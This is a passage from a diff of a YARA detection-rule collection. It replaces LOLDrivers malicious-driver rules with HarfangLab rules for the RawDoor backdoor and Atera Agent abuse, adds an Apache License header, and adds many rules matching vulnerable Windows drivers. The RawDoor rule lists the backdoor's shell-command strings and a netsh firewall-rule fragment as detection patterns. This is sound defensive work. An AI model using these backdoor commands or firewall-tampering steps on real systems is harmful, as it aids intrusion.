-		description = "Detects malicious driver mentioned in LOLDrivers project using VersionInfo values from the PE header - Sense5Ext.sys"
-		author = "Florian Roth"
-		id = "6c1f5ba4-fd14-5069-9d99-e3072b2dbbc2"
-		date = "2025-03-07"
-		modified = "2025-03-07"
-		reference = "https://github.com/magicsword-io/LOLDrivers"
-		source_url = "https://github.com/magicsword-io/LOLDrivers//blob/e2e48f15a0885e8b2ad2fb81255089845f5c183c/detections/yara/yara-rules_mal_drivers.yar#L857-L873"
-		license_url = "https://github.com/magicsword-io/LOLDrivers//blob/e2e48f15a0885e8b2ad2fb81255089845f5c183c/LICENSE"
-		hash = "7f4555a940ce1156c9bcea9a2a0b801f9a5e44ec9400b61b14a7b1a6404ffdf6"
-		logic_hash = "dbef723d7e44da110675402fc13708c5b077eeb6a66c1772885f5879d795ec4e"
-		score = 70
-		quality = 80
-		tags = ""
+		description = "Matches the RawDoor payload"
+		author = "HarfangLab"
+		id = "5fef27fe-a2ea-56b4-8cf6-8f6c4bf85d80"
+		date = "2024-04-12"
+		modified = "2025-04-16"
+		reference = "TRR240401"
+		source_url = "https://github.com/HarfangLab/iocs/blob/1df815f4210f1d26151026cdd9658dbfc262b019/hl_public_reports_master.yar#L730-L754"
+		license_url = "N/A"
+		hash = "fade96ec359474962f2167744ca8c55ab4e6d0700faa142b3d95ec3f4765023b"
+		logic_hash = "51bd04603419d5bc77f12618df986f6b31ea8ddea553c6bc7580698fa236b3ed"
+		score = 75
+		quality = 55
+		tags = "FILE"
+		context = "file"
 
 	strings:
-		$ = { 00460069006c0065004400650073006300720069007000740069006f006e[1-8]00530065006e0073006500350020004400720069007600650072 }
-		$ = { 0043006f006d00700061006e0079004e0061006d0065[1-8]00530065006e00730065003500200043004f00520050 }
-		$ = { 00460069006c006500560065007200730069006f006e[1-8]0032002e0036002e0030002e0030 }
-		$ = { 00500072006f006400750063007400560065007200730069006f006e[1-8]0032002e0036002e0030002e0030 }
-		$ = { 004c006500670061006c0043006f0070007900720069006700680074[1-8]0043006f0070007900720069006700680074002000280043002900200032003000320032 }
+		$name = "\x0D\x0A=================RawDoor %g================\x0D\x0A" ascii
+		$key = /SOFTWARE\\Clients\\Netra(u|w)/ ascii
+		$cmd1 = "Shell <powershell.exe path>" ascii
+		$cmd2 = "Selfcmd <self cmd string>" ascii
+		$cmd3 = "Wsrun <process name>" ascii
+		$cmd4 = "ping 127.0.0.1 > nul\x0D\x0A"
+		$cmd5 = "/c netsh advfirewall firewall add rule name=" ascii
+		$msg1 = "Allocate pSd memory to failed!" ascii
+		$msg2 = "Allocate SID or ACL to failed!" ascii
+		$msg3 = "OpenSCManager error:%d" ascii
+		$msg4 = "%u:TCP:*:Enabled:%u" ascii
 
 	condition:
-		all of them
+		uint16( 0 ) == 0x5A4D and filesize < 200KB and ( ( $name and $key ) or ( 3 of ( $cmd* ) and 3 of ( $msg* ) ) )
 }
-rule LOLDRIVERS_MAL_Driver_Microsoftcorporation_Ndislansys_Microsoftwindowsoperatingsystem_B0EB
+rule HARFANGLAB_Custom_Ateraagent_Operator : FILE
 {
 	meta:
-		description = "Detects malicious driver mentioned in LOLDrivers project using VersionInfo values from the PE header - ndislan.sys"
-		author = "Florian Roth"
-		id = "c94adcf3-2ea6-5856-9327-2e5ed1c49b22"
-		date = "2025-03-07"
-		modified = "2025-03-07"
-		reference = "https://github.com/magicsword-io/LOLDrivers"
-		source_url = "https://github.com/magicsword-io/LOLDrivers//blob/e2e48f15a0885e8b2ad2fb81255089845f5c183c/detections/yara/yara-rules_mal_drivers.yar#L876-L895"
-		license_url = "https://github.com/magicsword-io/LOLDrivers//blob/e2e48f15a0885e8b2ad2fb81255089845f5c183c/LICENSE"
-		hash = "b0eb4d999e4e0e7c2e33ff081e847c87b49940eb24a9e0794c6aa9516832c427"
-		logic_hash = "4b92b69636dea19a23172def47e9a1bbd4507075ec118b48db30fec377b8fbff"
-		score = 70
+		description = "Detect Atera Agent configured to certain email addresses, or email domains"
+		author = "HarfangLab"
+		id = "af0fae1d-2d25-5551-8720-ff1172ff4eea"
+		date = "2024-04-17"
+		modified = "2024-04-22"
+		reference = "TRR240402"
+		source_url = "https://github.com/HarfangLab/iocs/blob/1df815f4210f1d26151026cdd9658dbfc262b019/TRR240402/trr240402_yara-template.yar#L1-L20"
+		license_url = "N/A"
+		logic_hash = "71622b61c5f645dd846327b79bf6dddefef458b73a82caa34d086da2ba48cd8c"
+		score = 75
 		quality = 80
-		tags = ""
+		tags = "FILE"
+		context = "file"
 
 	strings:
-		$ = { 00460069006c0065004400650073006300720069007000740069006f006e[1-8]004d00530020004c0041004e0020004400720069007600650072 }
-		$ = { 0043006f006d00700061006e0079004e0061006d0065[1-8]004d006900630072006f0073006f0066007400200043006f00720070006f0072006100740069006f006e }
-		$ = { 00460069006c006500560065007200730069006f006e[1-8]0036002e0031002e0037003600300030002e0031003400320031 }
-		$ = { 00500072006f006400750063007400560065007200730069006f006e[1-8]0036002e0031002e0037003600300030002e0031003400320031 }
-		$ = { 0049006e007400650072006e0061006c004e0061006d0065[1-8]006e006400690073006c0061006e002e007300790073 }
-		$ = { 00500072006f0064007500630074004e0061006d0065[1-8]004d006900630072006f0073006f0066007400ae002000570069006e0064006f0077007300ae0020004f007000650072006100740069006e0067002000530079007300740065006d }
-		$ = { 004f0072006900670069006e0061006c00460069006c0065006e0061006d0065[1-8]006e006400690073006c0061006e002e007300790073 }
-		$ = { 004c006500670061006c0043006f0070007900720069006700680074[1-8]00a90020004d006900630072006f0073006f0066007400200043006f00720070006f0072006100740069006f006e002e00200041006c006c0020007200690067006800740073002000720065007300650072007600650064002e }
+		$email = "email@domain.tld"
+		$s1 = "PREVIOUSFOUNDWIX_UPGRADE_DETECTED"
+		$s2 = "INTEGRATORLOGIN"
+		$sc1 = { 0A 28 49 99 78 E5 89 8D F4 0A 23 8E B8 A5 52 E8 }
+		$sc2 = { 06 7F 60 47 95 66 24 A7 15 99 61 74 3D 81 94 93 }
 
 	condition:
-		all of them
+		filesize > 1MB and filesize < 4MB and ( uint16be( 0 ) == 0xD0CF ) and @s1 < @email and @email < @s2 [ 3 ] and any of ( $sc* )
 }
+/*
+ * YARA Rule Set
+ * Repository Name: LOLDrivers
+ * Repository: https://github.com/magicsword-io/LOLDrivers/
+ * Retrieval Date: 2025-06-15
+ * Git Commit: e2e48f15a0885e8b2ad2fb81255089845f5c183c
+ * Number of Rules: 565
+ * Skipped: 0 (age), 0 (quality), 0 (score), 0 (importance)
+ *
+ *
+ * LICENSE
+ *
+ *                                  Apache License
+                           Version 2.0, January 2004
+                        http://www.apache.org/licenses/
+
+   TERMS AND CONDITIONS FOR USE, REPRODUCTION, AND DISTRIBUTION
+
+   1. Definitions.
+
+      "License" shall mean the terms and conditions for use, reproduction,
+      and distribution as defined by Sections 1 through 9 of this document.
+
+      "Licensor" shall mean the copyright owner or entity authorized by
+      the copyright owner that is granting the License.
+
+      "Legal Entity" shall mean the union of the acting entity and all
+      other entities that control, are controlled by, or are under common
+      control with that entity. For the purposes of this definition,
+      "control" means (i) the power, direct or indirect, to cause the
+      direction or management of such entity, whether by contract or
+      otherwise, or (ii) ownership of fifty percent (50%) or more of the
+      outstanding shares, or (iii) beneficial ownership of such entity.
+
+      "You" (or "Your") shall mean an individual or Legal Entity
+      exercising permissions granted by this License.
+
+      "Source" form shall mean the preferred form for making modifications,
+      including but not limited to software source code, documentation
+      source, and configuration files.
+
+      "Object" form shall mean any form resulting from mechanical
+      transformation or translation of a Source form, including but
+      not limited to compiled object code, generated documentation,
+      and conversions to other media types.
+
+      "Work" shall mean the work of authorship, whether in Source or
+      Object form, made available under the License, as indicated by a
+      copyright notice that is included in or attached to the work
+      (an example is provided in the Appendix below).
+
+      "Derivative Works" shall mean any work, whether in Source or Object
+      form, that is based on (or derived from) the Work and for which the
+      editorial revisions, annotations, elaborations, or other modifications
+      represent, as a whole, an original work of authorship. For the purposes
+      of this License, Derivative Works shall not include works that remain
+      separable from, or merely link (or bind by name) to the interfaces of,
+      the Work and Derivative Works thereof.
+
+      "Contribution" shall mean any work of authorship, including
+      the original version of the Work and any modifications or additions
+      to that Work or Derivative Works thereof, that is intentionally
+      submitted to Licensor for inclusion in the Work by the copyright owner
+      or by an individual or Legal Entity authorized to submit on behalf of
+      the copyright owner. For the purposes of this definition, "submitted"
+      means any form of electronic, verbal, or written communication sent
+      to the Licensor or its representatives, including but not limited to
+      communication on electronic mailing lists, source code control systems,
+      and issue tracking systems that are managed by, or on behalf of, the
+      Licensor for the purpose of discussing and improving the Work, but
+      excluding communication that is conspicuously marked or otherwise
+      designated in writing by the copyright owner as "Not a Contribution."
+
+      "Contributor" shall mean Licensor and any individual or Legal Entity
+      on behalf of whom a Contribution has been received by Licensor and
+      subsequently incorporated within the Work.
+
+   2. Grant of Copyright License. Subject to the terms and conditions of
+      this License, each Contributor hereby grants to You a perpetual,
+      worldwide, non-exclusive, no-charge, royalty-free, irrevocable
+      copyright license to reproduce, prepare Derivative Works of,
+      publicly display, publicly perform, sublicense, and distribute the
+      Work and such Derivative Works in Source or Object form.
+
+   3. Grant of Patent License. Subject to the terms and conditions of
+      this License, each Contributor hereby grants to You a perpetual,
+      worldwide, non-exclusive, no-charge, royalty-free, irrevocable
+      (except as stated in this section) patent license to make, have made,
+      use, offer to sell, sell, import, and otherwise transfer the Work,
+      where such license applies only to those patent claims licensable
+      by such Contributor that are necessarily infringed by their
+      Contribution(s) alone or by combination of their Contribution(s)
+      with the Work to which such Contribution(s) was submitted. If You
+      institute patent litigation against any entity (including a
+      cross-claim or counterclaim in a lawsuit) alleging that the Work
+      or a Contribution incorporated within the Work constitutes direct
+      or contributory patent infringement, then any patent licenses
+      granted to You under this License for that Work shall terminate
+      as of the date such litigation is filed.
+
+   4. Redistribution. You may reproduce and distribute copies of the
+      Work or Derivative Works thereof in any medium, with or without
+      modifications, and in Source or Object form, provided that You
+      meet the following conditions:
+
+      (a) You must give any other recipients of the Work or
+          Derivative Works a copy of this License; and
+
+      (b) You must cause any modified files to carry prominent notices
+          stating that You changed the files; and
+
+      (c) You must retain, in the Source form of any Derivative Works
+          that You distribute, all copyright, patent, trademark, and
+          attribution notices from the Source form of the Work,
+          excluding those notices that do not pertain to any part of
+          the Derivative Works; and
+
+      (d) If the Work includes a "NOTICE" text file as part of its
+          distribution, then any Derivative Works that You distribute must
+          include a readable copy of the attribution notices contained
+          within such NOTICE file, excluding those notices that do not
+          pertain to any part of the Derivative Works, in at least one
+          of the following places: within a NOTICE text file distributed
+          as part of the Derivative Works; within the Source form or
+          documentation, if provided along with the Derivative Works; or,
+          within a display generated by the Derivative Works, if and
+          wherever such third-party notices normally appear. The contents
+          of the NOTICE file are for informational purposes only and
+          do not modify the License. You may add Your own attribution
+          notices within Derivative Works that You distribute, alongside
+          or as an addendum to the NOTICE text from the Work, provided
+          that such additional attribution notices cannot be construed
+          as modifying the License.
+
+      You may add Your own copyright statement to Your modifications and
+      may provide additional or different license terms and conditions
+      for use, reproduction, or distribution of Your modifications, or
+      for any such Derivative Works as a whole, provided Your use,
+      reproduction, and distribution of the Work otherwise complies with
+      the conditions stated in this License.
+
+   5. Submission of Contributions. Unless You explicitly state otherwise,
+      any Contribution intentionally submitted for inclusion in the Work
+      by You to the Licensor shall be under the terms and conditions of
+      this License, without any additional terms or conditions.
+      Notwithstanding the above, nothing herein shall supersede or modify
+      the terms of any separate license agreement you may have executed
+      with Licensor regarding such Contributions.
+
+   6. Trademarks. This License does not grant permission to use the trade
+      names, trademarks, service marks, or product names of the Licensor,
+      except as required for reasonable and customary use in describing the
+      origin of the Work and reproducing the content of the NOTICE file.
+
+   7. Disclaimer of Warranty. Unless required by applicable law or
+      agreed to in writing, Licensor provides the Work (and each
+      Contributor provides its Contributions) on an "AS IS" BASIS,
+      WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or
+      implied, including, without limitation, any warranties or conditions
+      of TITLE, NON-INFRINGEMENT, MERCHANTABILITY, or FITNESS FOR A
+      PARTICULAR PURPOSE. You are solely responsible for determining the
+      appropriateness of using or redistributing the Work and assume any
+      risks associated with Your exercise of permissions under this License.
+
+   8. Limitation of Liability. In no event and under no legal theory,
+      whether in tort (including negligence), contract, or otherwise,
+      unless required by applicable law (such as deliberate and grossly
+      negligent acts) or agreed to in writing, shall any Contributor be
+      liable to You for damages, including any direct, indirect, special,
+      incidental, or consequential damages of any character arising as a
+      result of this License or out of the use or inability to use the
+      Work (including but not limited to damages for loss of goodwill,
+      work stoppage, computer failure or malfunction, or any and all
+      other commercial damages or losses), even if such Contributor
+      has been advised of the possibility of such damages.
+
+   9. Accepting Warranty or Additional Liability. While redistributing
+      the Work or Derivative Works thereof, You may choose to offer,
+      and charge a fee for, acceptance of support, warranty, indemnity,
+      or other liability obligations and/or rights consistent with this
+      License. However, in accepting such obligations, You may act only
+      on Your own behalf and on Your sole responsibility, not on behalf
+      of any other Contributor, and only if You agree to indemnify,
+      defend, and hold each Contributor harmless for any liability
+      incurred by, or claims asserted against, such Contributor by reason
+      of your accepting any such warranty or additional liability.
+
+   END OF TERMS AND CONDITIONS
+
+   APPENDIX: How to apply the Apache License to your work.
+
+      To apply the Apache License to your work, attach the following
+      boilerplate notice, with the fields enclosed by brackets "[]"
+      replaced with your own identifying information. (Don't include
+      the brackets!)  The text should be enclosed in the appropriate
+      comment syntax for the file format. We also recommend that a
+      file or class name and description of purpose be included on the
+      same "printed page" as the copyright notice for easier
+      identification within third-party archives.
+
+   Copyright [yyyy] [name of copyright owner]
+
+   Licensed under the Apache License, Version 2.0 (the "License");
+   you may not use this file except in compliance with the License.
+   You may obtain a copy of the License at
+
+       http://www.apache.org/licenses/LICENSE-2.0
+
+   Unless required by applicable law or agreed to in writing, software
+   distributed under the License is distributed on an "AS IS" BASIS,
+   WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
+   See the License for the specific language governing permissions and
+   limitations under the License.
+
+ */
 rule LOLDRIVERS_PUA_VULN_Driver_Cpuid_Cpuzsys_Cpuidservice_34BE : FILE
 {
 	meta:
@@ -225260,162 +224578,1173 @@ rule LOLDRIVERS_PUA_VULN_Driver_Vektortsecurityservice_Vboxdrv_Antidetectpublicb
 		date = "2025-03-07"
 		modified = "2025-03-07"
 		reference = "https://github.com/magicsword-io/LOLDrivers"
-		source_url = "https://github.com/magicsword-io/LOLDrivers//blob/e2e48f15a0885e8b2ad2fb81255089845f5c183c/detections/yara/yara-rules_vuln_drivers_strict.yar#L10937-L10956"
+		source_url = "https://github.com/magicsword-io/LOLDrivers//blob/e2e48f15a0885e8b2ad2fb81255089845f5c183c/detections/yara/yara-rules_vuln_drivers_strict.yar#L10937-L10956"
+		license_url = "https://github.com/magicsword-io/LOLDrivers//blob/e2e48f15a0885e8b2ad2fb81255089845f5c183c/LICENSE"
+		hash = "26f41e4268be59f5de07552b51fa52d18d88be94f8895eb4a16de0f3940cf712"
+		logic_hash = "913dc412be3eaa31903d3fac94e07174789bb746bb382a5f1c08fea50541f6c6"
+		score = 40
+		quality = 80
+		tags = "FILE"
+
+	strings:
+		$ = { 00460069006c0065004400650073006300720069007000740069006f006e[1-8]005600690072007400750061006c0042006f007800200053007500700070006f007200740020004400720069007600650072 }
+		$ = { 0043006f006d00700061006e0079004e0061006d0065[1-8]00560065006b0074006f0072002000540031003300200053006500630075007200690074007900200053006500720076006900630065 }
+		$ = { 00460069006c006500560065007200730069006f006e[1-8]0031002e0032002e0030002e003100310039003200330030 }
+		$ = { 00500072006f006400750063007400560065007200730069006f006e[1-8]0031002e0032002e0030002e003100310039003200330030 }
+		$ = { 0049006e007400650072006e0061006c004e0061006d0065[1-8]00560042006f0078004400720076 }
+		$ = { 00500072006f0064007500630074004e0061006d0065[1-8]0041006e00740069006400650074006500630074002000320030003100380020005000750062006c00690063002000620079002000560065006b0074006f0072002000540031003300200028007200650076002e003000350029 }
+		$ = { 004f0072006900670069006e0061006c00460069006c0065006e0061006d0065[1-8]00560042006f0078004400720076002e007300790073 }
+		$ = { 004c006500670061006c0043006f0070007900720069006700680074[1-8]0043006f0070007900720069006700680074002000280043002900200032003000300039002d00320030003100380020004f007200610063006c006500200043006f00720070006f0072006100740069006f006e }
+
+	condition:
+		uint16( 0 ) == 0x5a4d and filesize < 400KB and all of them
+}
+rule LOLDRIVERS_PUA_VULN_Driver_Trendmicroinc_Tmcommsys_Trendmicroeyes_3C42 : FILE
+{
+	meta:
+		description = "Detects vulnerable driver mentioned in LOLDrivers project using VersionInfo values from the PE header - TmComm.sys"
+		author = "Florian Roth"
+		id = "e4c649d8-941e-57d8-9193-a7e5c3de4671"
+		date = "2025-03-07"
+		modified = "2025-03-07"
+		reference = "https://github.com/magicsword-io/LOLDrivers"
+		source_url = "https://github.com/magicsword-io/LOLDrivers//blob/e2e48f15a0885e8b2ad2fb81255089845f5c183c/detections/yara/yara-rules_vuln_drivers_strict.yar#L10959-L10978"
+		license_url = "https://github.com/magicsword-io/LOLDrivers//blob/e2e48f15a0885e8b2ad2fb81255089845f5c183c/LICENSE"
+		hash = "3c4207c90c97733fae2a08679d63fbbe94dfcf96fdfdf88406aa7ab3f80ea78f"
+		logic_hash = "b3e67939d8f6e6121c3d36dfe5ccb01c9cd2a2d5488053a9834c7cb147ac250e"
+		score = 40
+		quality = 80
+		tags = "FILE"
+
+	strings:
+		$ = { 00460069006c0065004400650073006300720069007000740069006f006e[1-8]005400720065006e0064004d006900630072006f00200043006f006d006d006f006e0020004d006f00640075006c0065 }
+		$ = { 0043006f006d00700061006e0079004e0061006d0065[1-8]005400720065006e00640020004d006900630072006f00200049006e0063002e }
+		$ = { 00460069006c006500560065007200730069006f006e[1-8]0036002e00370030002e0030002e0031003100320038 }
+		$ = { 00500072006f006400750063007400560065007200730069006f006e[1-8]0036002e00370030 }
+		$ = { 0049006e007400650072006e0061006c004e0061006d0065[1-8]0054006d0043006f006d006d002e007300790073 }
+		$ = { 00500072006f0064007500630074004e0061006d0065[1-8]005400720065006e00640020004d006900630072006f00200045007900650073 }
+		$ = { 004f0072006900670069006e0061006c00460069006c0065006e0061006d0065[1-8]0054006d0043006f006d006d002e007300790073 }
+		$ = { 004c006500670061006c0043006f0070007900720069006700680074[1-8]0043006f0070007900720069006700680074002000200028004300290020002000320030003200300020005400720065006e00640020004d006900630072006f00200049006e0063006f00720070006f00720061007400650064002e00200041006c006c0020007200690067006800740073002000720065007300650072007600650064002e }
+
+	condition:
+		uint16( 0 ) == 0x5a4d and filesize < 400KB and all of them
+}
+rule LOLDRIVERS_PUA_VULN_Driver_Asustekcomputerinc_Atsziosys_Atsziodriver_55A1 : FILE
+{
+	meta:
+		description = "Detects vulnerable driver mentioned in LOLDrivers project using VersionInfo values from the PE header - ATSZIO.sys"
+		author = "Florian Roth"
+		id = "3bd64a09-bfa9-5b87-8048-60e61c1a61f7"
+		date = "2025-03-07"
+		modified = "2025-03-07"
+		reference = "https://github.com/magicsword-io/LOLDrivers"
+		source_url = "https://github.com/magicsword-io/LOLDrivers//blob/e2e48f15a0885e8b2ad2fb81255089845f5c183c/detections/yara/yara-rules_vuln_drivers_strict.yar#L10981-L11001"
+		license_url = "https://github.com/magicsword-io/LOLDrivers//blob/e2e48f15a0885e8b2ad2fb81255089845f5c183c/LICENSE"
+		hash = "55a1535e173c998fbbc978009b02d36ca0c737340d84ac2a8da73dfc2f450ef9"
+		hash = "c64d4ac416363c7a1aa828929544d1c1d78cf032b39769943b851cfc4c0faafc"
+		logic_hash = "a6c5fd6c88e08f663479840ae853a0dd22427d0059f0c6aa961dcc1a395dacce"
+		score = 40
+		quality = 80
+		tags = "FILE"
+
+	strings:
+		$ = { 00460069006c0065004400650073006300720069007000740069006f006e[1-8]004100540053005a0049004f0020004400720069007600650072 }
+		$ = { 0043006f006d00700061006e0079004e0061006d0065[1-8]004100530055005300540065006b00200043006f006d0070007500740065007200200049006e0063002e }
+		$ = { 00460069006c006500560065007200730069006f006e[1-8]0030002e0032002e0031002e0036 }
+		$ = { 00500072006f006400750063007400560065007200730069006f006e[1-8]0030002e0032002e0031002e0036 }
+		$ = { 0049006e007400650072006e0061006c004e0061006d0065[1-8]004100540053005a0049004f002e007300790073 }
+		$ = { 00500072006f0064007500630074004e0061006d0065[1-8]004100540053005a0049004f0020004400720069007600650072 }
+		$ = { 004f0072006900670069006e0061006c00460069006c0065006e0061006d0065[1-8]004100540053005a0049004f002e007300790073 }
+		$ = { 004c006500670061006c0043006f0070007900720069006700680074[1-8]0043006f0070007900720069006700680074002000280043002900200032003000310032 }
+
+	condition:
+		uint16( 0 ) == 0x5a4d and filesize < 100KB and all of them
+}
+rule LOLDRIVERS_PUA_VULN_Driver_Windowsrwinddkprovider_Sbiosiosys_Samsungrbiosiodriver_B3D1 : FILE
+{
+	meta:
+		description = "Detects vulnerable driver mentioned in LOLDrivers project using VersionInfo values from the PE header - SBIOSIO64.sys"
+		author = "Florian Roth"
+		id = "d2eed5da-ca7c-5ae3-ab44-2a49f43ec409"
+		date = "2025-03-07"
+		modified = "2025-03-07"
+		reference = "https://github.com/magicsword-io/LOLDrivers"
+		source_url = "https://github.com/magicsword-io/LOLDrivers//blob/e2e48f15a0885e8b2ad2fb81255089845f5c183c/detections/yara/yara-rules_vuln_drivers_strict.yar#L11004-L11024"
+		license_url = "https://github.com/magicsword-io/LOLDrivers//blob/e2e48f15a0885e8b2ad2fb81255089845f5c183c/LICENSE"
+		hash = "b3d1bdd4ad819b99870b6e2ed3527dfc0e3ce27b929ad64382b9c3d4e332315c"
+		hash = "442d506c1ac1f48f6224f0cdd64590779aee9c88bdda2f2cc3169b862cba1243"
+		logic_hash = "5bcc568a4f4edc03e51801c4b256b34ed7f7ae08b7e00ca3f4bd7559502e3c76"
+		score = 40
+		quality = 80
+		tags = "FILE"
+
+	strings:
+		$ = { 00460069006c0065004400650073006300720069007000740069006f006e[1-8]005300420049004f00530049004f0020004400720069007600650072 }
+		$ = { 0043006f006d00700061006e0079004e0061006d0065[1-8]00570069006e0064006f007700730020002800520029002000570069006e00200037002000440044004b002000700072006f00760069006400650072 }
+		$ = { 00460069006c006500560065007200730069006f006e[1-8]0031002e0031002e0030003000300030002e0030 }
+		$ = { 00500072006f006400750063007400560065007200730069006f006e[1-8]0031002e0031002e0030003000300030002e0030 }
+		$ = { 0049006e007400650072006e0061006c004e0061006d0065[1-8]005300420049004f00530049004f00360034002e007300790073 }
+		$ = { 00500072006f0064007500630074004e0061006d0065[1-8]00530061006d00730075006e00670020002800520029002000420049004f005300200049004f0020006400720069007600650072 }
+		$ = { 004f0072006900670069006e0061006c00460069006c0065006e0061006d0065[1-8]005300420049004f00530049004f00360034002e007300790073 }
+		$ = { 004c006500670061006c0043006f0070007900720069006700680074[1-8]0043006f00700079007200690067006800740020002800630029002000530061006d00730075006e006700200045006c0065006300740072006f006e006900630073002e00200041006c006c0020007200690067006800740073002000720065007300650072007600650064002e }
+
+	condition:
+		uint16( 0 ) == 0x5a4d and filesize < 100KB and all of them
+}
+rule LOLDRIVERS_PUA_VULN_Driver_Sisoftware_Sandra_Sisoftwaresandra_1AAF : FILE
+{
+	meta:
+		description = "Detects vulnerable driver mentioned in LOLDrivers project using VersionInfo values from the PE header - sandra.sys"
+		author = "Florian Roth"
+		id = "9fc423bb-451b-52e8-ba81-7113cd1621c8"
+		date = "2025-03-07"
+		modified = "2025-03-07"
+		reference = "https://github.com/magicsword-io/LOLDrivers"
+		source_url = "https://github.com/magicsword-io/LOLDrivers//blob/e2e48f15a0885e8b2ad2fb81255089845f5c183c/detections/yara/yara-rules_vuln_drivers_strict.yar#L11027-L11046"
+		license_url = "https://github.com/magicsword-io/LOLDrivers//blob/e2e48f15a0885e8b2ad2fb81255089845f5c183c/LICENSE"
+		hash = "1aaf4c1e3cb6774857e2eef27c17e68dc1ae577112e4769665f516c2e8c4e27b"
+		logic_hash = "e441204be274ce4379526096008b545e2a53b11c26c270c2df0c1f70b98d1e57"
+		score = 40
+		quality = 80
+		tags = "FILE"
+
+	strings:
+		$ = { 00460069006c0065004400650073006300720069007000740069006f006e[1-8]00530061006e006400720061002000440065007600690063006500200044007200690076006500720020002800570069006e003600340020007800360034002900280055006e00690063006f006400650029 }
+		$ = { 0043006f006d00700061006e0079004e0061006d0065[1-8]005300690053006f006600740077006100720065 }
+		$ = { 00460069006c006500560065007200730069006f006e[1-8]00310030002e00310031002e0031002e00310020006200750069006c0074002000620079003a002000570069006e00440044004b }
+		$ = { 00500072006f006400750063007400560065007200730069006f006e[1-8]00310030002e00310031002e0031002e0031 }
+		$ = { 0049006e007400650072006e0061006c004e0061006d0065[1-8]00530041004e004400520041 }
+		$ = { 00500072006f0064007500630074004e0061006d0065[1-8]005300690053006f006600740077006100720065002000530061006e006400720061 }
+		$ = { 004f0072006900670069006e0061006c00460069006c0065006e0061006d0065[1-8]00530041004e004400520041 }
+		$ = { 004c006500670061006c0043006f0070007900720069006700680074[1-8]0043006f0070007900720069006700680074002000a90020005300690053006f0066007400770061007200650020004c0074006400200031003900390035002d0032003000300038002e00200041006c006c0020007200690067006800740073002000720065007300650072007600650064002e }
+
+	condition:
+		uint16( 0 ) == 0x5a4d and filesize < 100KB and all of them
+}
+rule LOLDRIVERS_PUA_VULN_Driver_Windowsrwinddkprovider_Dcprotectsys_Dcprotectrwinxdriver_1698 : FILE
+{
+	meta:
+		description = "Detects vulnerable driver mentioned in LOLDrivers project using VersionInfo values from the PE header - DcProtect.sys"
+		author = "Florian Roth"
+		id = "4be3fa3a-dec2-5906-99b0-024c8ed059a5"
+		date = "2025-03-07"
+		modified = "2025-03-07"
+		reference = "https://github.com/magicsword-io/LOLDrivers"
+		source_url = "https://github.com/magicsword-io/LOLDrivers//blob/e2e48f15a0885e8b2ad2fb81255089845f5c183c/detections/yara/yara-rules_vuln_drivers_strict.yar#L11049-L11068"
+		license_url = "https://github.com/magicsword-io/LOLDrivers//blob/e2e48f15a0885e8b2ad2fb81255089845f5c183c/LICENSE"
+		hash = "1698ba7eeee6ff9272cc25b242af89190ff23fd9530f21aa8f0f3792412594f3"
+		logic_hash = "be362e0f19f3565a77b1dbd78ea04f85b7f56fd6889d8fa48ed9ded25134bc2e"
+		score = 40
+		quality = 80
+		tags = "FILE"
+
+	strings:
+		$ = { 00460069006c0065004400650073006300720069007000740069006f006e[1-8]0044006300500072006f00740065006300740020004400720069007600650072 }
+		$ = { 0043006f006d00700061006e0079004e0061006d0065[1-8]00570069006e0064006f007700730020002800520029002000570069006e00200037002000440044004b002000700072006f00760069006400650072 }
+		$ = { 00460069006c006500560065007200730069006f006e[1-8]0031002e0032002e0030002e0030 }
+		$ = { 00500072006f006400750063007400560065007200730069006f006e[1-8]0031002e0032002e0030002e0030 }
+		$ = { 0049006e007400650072006e0061006c004e0061006d0065[1-8]0044006300500072006f0074006500630074002e007300790073 }
+		$ = { 00500072006f0064007500630074004e0061006d0065[1-8]0044006300500072006f00740065006300740020002800520029002000570069006e003700780036003400200064007200690076006500720020 }
+		$ = { 004f0072006900670069006e0061006c00460069006c0065006e0061006d0065[1-8]0044006300500072006f0074006500630074002e007300790073 }
+		$ = { 004c006500670061006c0043006f0070007900720069006700680074[1-8]0043006f0070007900720069006700680074002000280043002900200032003000310032002d00320030003200300020004a00690061006e0067006d0065006e0020004500790075006e0020004e006500740077006f0072006b00200043006f002e002c004c00740064002e00200032003000310039 }
+
+	condition:
+		uint16( 0 ) == 0x5a4d and filesize < 100KB and all of them
+}
+rule LOLDRIVERS_PUA_VULN_Driver_Trendmicroinc_Tmcommsys_Aegis_C901 : FILE
+{
+	meta:
+		description = "Detects vulnerable driver mentioned in LOLDrivers project using VersionInfo values from the PE header - TmComm.sys"
+		author = "Florian Roth"
+		id = "a1c33a78-bef9-59fc-8976-876c1fe68aff"
+		date = "2025-03-07"
+		modified = "2025-03-07"
+		reference = "https://github.com/magicsword-io/LOLDrivers"
+		source_url = "https://github.com/magicsword-io/LOLDrivers//blob/e2e48f15a0885e8b2ad2fb81255089845f5c183c/detections/yara/yara-rules_vuln_drivers_strict.yar#L11071-L11090"
+		license_url = "https://github.com/magicsword-io/LOLDrivers//blob/e2e48f15a0885e8b2ad2fb81255089845f5c183c/LICENSE"
+		hash = "c9014b03866bf37faa8fdb16b6af7cfec976aaef179fd5797d0c0bf8079d3a8c"
+		logic_hash = "2320a0cc02aa28c6495f553b2c7c9c0486599e510d8378dfb3f15b988ff90983"
+		score = 40
+		quality = 80
+		tags = "FILE"
+
+	strings:
+		$ = { 00460069006c0065004400650073006300720069007000740069006f006e[1-8]005400720065006e0064004d006900630072006f00200043006f006d006d006f006e0020004d006f00640075006c0065 }
+		$ = { 0043006f006d00700061006e0079004e0061006d0065[1-8]005400720065006e00640020004d006900630072006f00200049006e0063002e }
+		$ = { 00460069006c006500560065007200730069006f006e[1-8]0032002e0030002e0030002e0031003100310038 }
+		$ = { 00500072006f006400750063007400560065007200730069006f006e[1-8]0032002e0030 }
+		$ = { 0049006e007400650072006e0061006c004e0061006d0065[1-8]0054006d0043006f006d006d002e007300790073 }
+		$ = { 00500072006f0064007500630074004e0061006d0065[1-8]00410045004700490053 }
+		$ = { 004f0072006900670069006e0061006c00460069006c0065006e0061006d0065[1-8]0054006d0043006f006d006d002e007300790073 }
+		$ = { 004c006500670061006c0043006f0070007900720069006700680074[1-8]0043006f0070007900720069006700680074002000280043002900200032003000300035002d00320030003000370020005400720065006e00640020004d006900630072006f00200049006e0063006f00720070006f00720061007400650064002e00200041006c006c0020007200690067006800740073002000720065007300650072007600650064002e }
+
+	condition:
+		uint16( 0 ) == 0x5a4d and filesize < 200KB and all of them
+}
